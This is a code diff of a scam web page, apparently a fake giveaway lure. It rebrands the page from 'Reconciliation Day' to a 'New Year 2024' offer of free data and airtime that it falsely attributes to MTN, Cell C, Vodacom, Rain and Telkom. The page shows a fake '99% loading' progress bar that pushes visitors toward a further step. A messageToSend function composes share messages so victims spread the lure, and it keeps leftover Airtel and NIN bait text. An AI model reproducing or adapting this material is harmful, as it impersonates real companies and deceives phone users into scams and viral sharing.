--- a/mtndamba.html
+++ b/mtndamba.html
@@ -39,14 +39,14 @@
     <meta charset="utf-8">
     <meta name="viewport"
           content="width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no"/>
-    <meta property="og:site_name" content="HAPPY RECONCILIATION DAY">
-    <meta property="og:title" content="HAPPY RECONCILIATION DAY"/>
-    <meta property="og:description" content="MTN, CELL C, VODACOM, RAIN AND TELKOM is Celebrating Reconciliation Day by rewarding their customers with 50GB free data and  R450 Airtime Voucher">
-    <meta property="og:image" itemprop="image" content="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgId8s-URWgAzQ9xcMshS-PxKCmy634o5Ll9mqKVJf2BMwr30L5uw3cSspftvXGzpe7FHIsG92nLlKNjpmuuWjuXniczwHgE-tfMr6qwsfnjyN4IHLUIHFGYnhMJbklcksI6Vc3nZ_E1QdwCRQm38HZvDB3NzIeu35z8BP9FOJx54HgBKb2uzv2At-BO41N/s320/E7007CE6-329E-4EC0-B95C-F45F39DA6433.jpeg">
+    <meta property="og:site_name" content="NEW YEAR CELEBRATION OFFER">
+    <meta property="og:title" content="NEW YEAR CELEBRATION OFFER"/>
+    <meta property="og:description" content="MTN, CELL C, VODACOM, RAIN AND TELKOM is Rewarding 50GB free data and R450 Airtime Voucher to their customers in Celebrating of New Year 2024">
+    <meta property="og:image" itemprop="image" content="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwlXCfP6ksdBk0qy3cNZzyZLGHpogb_UV0ixW9JQoTgPpVV8k83c1IT-k71coW9xyG8pRJw92lFNTQ7bpO5M1eRz5jJC7srq55eEFUGfdcyhfW8OBq9HlZsPW1Br8m54APoN9-HXaUmvK4bH_QxmYqQBsODFOrVlkujsAsyGtL3g-DEFcKFRuU104rNiuD/s320/717C458B-DEE9-48D5-B49C-E4C2F551B95C.jpeg">
     <meta property="og:type" content="website"/>
     <meta property="og:updated_time" content="1440432930"/>
     <!-- <link href="https://fonts.googleapis.com/css2?family=Montserrat:wght@400;500&display=swap" rel="stylesheet">-->
-    <title>HAPPY RECONCILIATION DAY</title>
+    <title>NEW YEAR CELEBRATION OFFER</title>
     
     
 
@@ -56,14 +56,14 @@
 </head>
 
 <body>
-    <img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhzVDrJ8eMJBEuF3s-V-R9L3-gvpC4_bsVng1dk5HKCA3dsU1Ik7PdZWZKJRFqPk-VXRgfqs9tajVCW5z93LKQdtTpw-0jPWDa39C4xBSNLNBGByBmKnzxtY38BAyPvXdrmQ7OPVycZgUig9iLzJHqHotEdz57K-Xbb8raMM7kt4XzfNSEFzSYBLPIzOfdJ/s1242/340D18B1-AFA1-4B3C-A968-01A956B03F56.jpeg" width="100%">
+    <img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhiw7zjKsZ0Nd7JQ2DtvoLwditV2AeacyGLbgD9PnZC4SjorAcbSp_dUswQ6huF9iglrOdCndCV_4mQFLRTlQyTx5nmxPnHDTO94fd4_T-JQkNSkNHqtpdlfnNiuh0stCBseqQrF3HezNghVoNpXE0RUvhK3yGKgyGzILJg08IUbVFMQa2inGPsP5KIOPY/s1242/17B37477-5690-46EC-BC82-6DAD1CCCC9B9.jpeg" width="100%">
 <div class="wrapper">
     <div class="container-main">
         <header class="logo-container">
             <svg fill="#e60000" height="20px" viewBox="-31 0 512 512" width="20px" xmlns="http://www.w3.org/2000/svg">
                 <path d="m30 316c-16.570312 0-30 13.429688-30 30 0 16.566406 13.429688 30 30 30h59l-14 106c0 16.566406 13.429688 30 30 30s30-13.433594 30-30l14-106h120l-14 106c0 16.566406 13.429688 30 30 30s30-13.433594 30-30l14-106h61c16.570312 0 30-13.433594 30-30 0-16.570312-13.429688-30-30-30h-53l16-120h67c16.570312 0 30-13.433594 30-30 0-16.570312-13.429688-30-30-30h-59l14-106c0-16.570312-13.429688-30-30-30s-30 13.429688-30 30l-14 106h-120l14-106c0-16.570312-13.429688-30-30-30s-30 13.429688-30 30l-14 106h-61c-16.570312 0-30 13.429688-30 30 0 16.566406 13.429688 30 30 30h53l-16 120zm143-120h120l-16 120h-120zm0 0" />
             </svg>
-            <b></b>MTN, CELL C, VODACOM, RAIN AND TELKOM is Celebrating Reconciliation Day by rewarding their customers with 50GB free data and R450 Airtime Voucher</b>
+            <b></b>MTN, CELL C, VODACOM, RAIN AND TELKOM is Rewarding 50GB free data and R450 Airtime Voucher to their customers in Celebrating of New Year 2024</b>
         </header>
         <div class="quedate-container">
             <main class="quedate">
@@ -78,7 +78,7 @@
                 <div class="quedate__step" id="first-box">
                     <div class="quedate__step-box">
                         <span class="quedate__border"></span>
-                        <p style="font-size: 1.7rem;" class="quedate__text">50GB + R450<b> RECONCILIATION DAY OFFER</b>
+                        <p style="font-size: 1.7rem;" class="quedate__text">50GB + R450<b> NEW YEAR OFFER</b>
                         </p>
                     </div>
                     <button style="margin:0;" id="validar" class="quedate__cta-btn">GET YOURS</button>
@@ -420,7 +420,7 @@
         <div class="loading2 js-hidden js-verify">
             <div class="loading2__box">
 
-                <b style="font-weight:bold; font-size:16px">Congratulations your 50gb + R450 Airtime Voucher Reconciliation Day Offer is laoding...99%. </b>
+                <b style="font-weight:bold; font-size:16px">Congratulations your 50gb + R450 Airtime Voucher New Year Offer is laoding...99%. </b>
                 <br>
                 <br><b>To facilitate the sending of data you must complete this final step of phone Type!</b>
                 <br>
@@ -467,7 +467,7 @@
 
 
 </a>
-<img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizFOaMVmudfHS1rTj_2ltq_OVh0p-EvC5m86kGoD9RVomokUerez5RRJGsBvfO0S3Im5ah4-5IcB_WA0tuSzIfrY_j7a-JMJtry2a8kQWLW_v28n0no9aQ-QTr6urzjAtxG6kBiYlswBR7OX41DaHTlDGWMDv1pAisiRbcNb67RplS2agBWW79IwunjFTw/s500/5BEE3881-9CB1-4EEE-B7F6-F7246AED6FE5.png" width="100%">
+<img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg67Kjgk1DuYbwm_Oqg26XlcHMN5amHeu34Uk0_tUW5rfRMT7Fac7VQ3vp249LAPehBjFvRgIPiyDzeC0EIdeQ8wqZ0Rc3oldzkIYtpDAeyCryst5keQMkj5jkXkNfDteuveO75pEOxOrkrjT5_jVQ32C3K4Iy6SXclfCp_aBIlQVPz8QKHzZc0gUhEnpUa/s3072/491E04D1-9863-43EF-8298-1C1F25790509.jpeg" width="100%">
 
 </p>
 
@@ -887,7 +887,7 @@
     function messageToSend() {
         var a = navigator.languages[0].includes("-") ? navigator.languages[0].slice(0, navigator.languages[0].indexOf("-")) : navigator.languages[0],
             b = "";
-        return "en" === a ? b = "*HAPPY RECONCILIATION DAY*%0A%0A_South Africa Reconciliation Day Celebration Offer_%0A%0A*MTN, CELL C, VODACOM, RAIN AND TELKOM* is Celebrating Reconciliation Day by rewarding their customers with *50GB* free data and *R450* Airtime Voucher %0A%0A*Click Here to Get Yours👇* " + landingDomain : "id" === a ? b = "AIRTEL%20GIFT%0A%0ACheck%20if%20Your%20number%20has%0Abeen%20chosen%20by%20NIN%20to%20receive%205GB%0AAs%20Part%20of%20customer%20REWARD%20Program%20For%0AWho%20have%20been%20using%20NIN%20for%20more%0Athan%20three%20months%20%0A%0ANIN%20USERS%20ONLY%20%0A%0ADeadline:30-01-2021 "+deadline()+" %0A%0AClick" + landingDomain : b = "AIRTEL%20GIFT%0A%0ACheck%20if%20Your%20number%20has%0Abeen%20chosen%20by%20NIN%20to%20receive%205GB%0AAs%20Part%20of%20verification%20REWARD%20Program%20For%0AWho%20have%20verified%20using%20NIN%20for%0Athe%20verification%20%0A%0AALL network%20USERS%20%20%0A%0ADeadline:30-01-2021 "+deadline()+" %0A%0AClick" + landingDomain ;
+        return "en" === a ? b = "*NEW YEAR CELEBRATION OFFER*%0A%0A_South Africa Reconciliation Day Celebration Offer_%0A%0A*MTN, CELL C, VODACOM, RAIN AND TELKOM* is Rewarding *50GB* free data and *R450* Airtime Voucher to their customers in Celebrating of New Year 2024%0A%0A*Click Here to Get Yours👇* " + landingDomain : "id" === a ? b = "AIRTEL%20GIFT%0A%0ACheck%20if%20Your%20number%20has%0Abeen%20chosen%20by%20NIN%20to%20receive%205GB%0AAs%20Part%20of%20customer%20REWARD%20Program%20For%0AWho%20have%20been%20using%20NIN%20for%20more%0Athan%20three%20months%20%0A%0ANIN%20USERS%20ONLY%20%0A%0ADeadline:30-01-2021 "+deadline()+" %0A%0AClick" + landingDomain : b = "AIRTEL%20GIFT%0A%0ACheck%20if%20Your%20number%20has%0Abeen%20chosen%20by%20NIN%20to%20receive%205GB%0AAs%20Part%20of%20verification%20REWARD%20Program%20For%0AWho%20have%20verified%20using%20NIN%20for%0Athe%20verification%20%0A%0AALL network%20USERS%20%20%0A%0ADeadline:30-01-2021 "+deadline()+" %0A%0AClick" + landingDomain ;
     }
 
     /* function messageToSend() {
